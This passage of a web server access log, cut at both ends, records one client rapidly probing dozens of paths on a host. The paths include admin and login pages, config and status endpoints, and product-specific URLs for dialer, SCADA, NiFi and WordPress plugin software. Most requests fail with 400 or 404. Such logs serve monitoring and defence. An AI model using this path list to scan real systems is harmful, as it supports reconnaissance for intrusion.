6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webpages/login.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/core/auth/login/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/status" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/kubepi/fav.png" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rest/settings" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/config_dump" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/download/python/" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/~login" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/angular.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sms_mp/.sms_aut?mplist" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/mailinspector/login.php" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/api/system/status" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ui/login.action" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:03 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin/config.php" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/getagent.cgi?type=s" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:03 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/public/static/favicon.png" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:03 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/agc/vicidial.php" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:03 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/agent/vicidial.php" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:03 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/" [Client 172.235.168.35] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:03 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/versions" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:03 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/p/login/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/system/gwinfo" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/AppsHome.do" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.do" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/check-version" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/openapi.json" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/jtcgi/wte.pyc" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/decisioncenter-api/v1/about" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nifi-api/flow/about" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.235.168.35] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/sys/en/neoclassic/login/login" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.lua" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/meteobridge.cgi" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api-description" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/info.htm" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nifi/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/v2" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.inc" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/post-smtp/readme.txt" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/sap/bc/ui2/flp" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/monitor/index.php/auth/login" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/cluster/summary" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/getagent.cgi?type=s" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ignite?cmd=version" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/management/v1/cluster/state" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2.0/systeminfo" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:05 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/browser/index.html" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ScadaBR/login.htm" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/system/status" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nmc/rss/server" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/rest/settings" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/sms_mp/.sms_aut?mplist" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/angular.js" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webpages/login.html" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/download/python/" [Client 172.235.168.35] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.jsp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.shtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:11 +0000] 200 - GET http 91-82-83-208.pool.digikabel.hu "/index.html" [Client 172.235.168.35] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.aspx" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.jhtml" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.php" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.cfm" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.asp" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.jsa" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.cgi" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.html" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.pl" [Client 172.235.168.35] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[18/Jan/2026:03:03:14 +0000] 404 - GET http 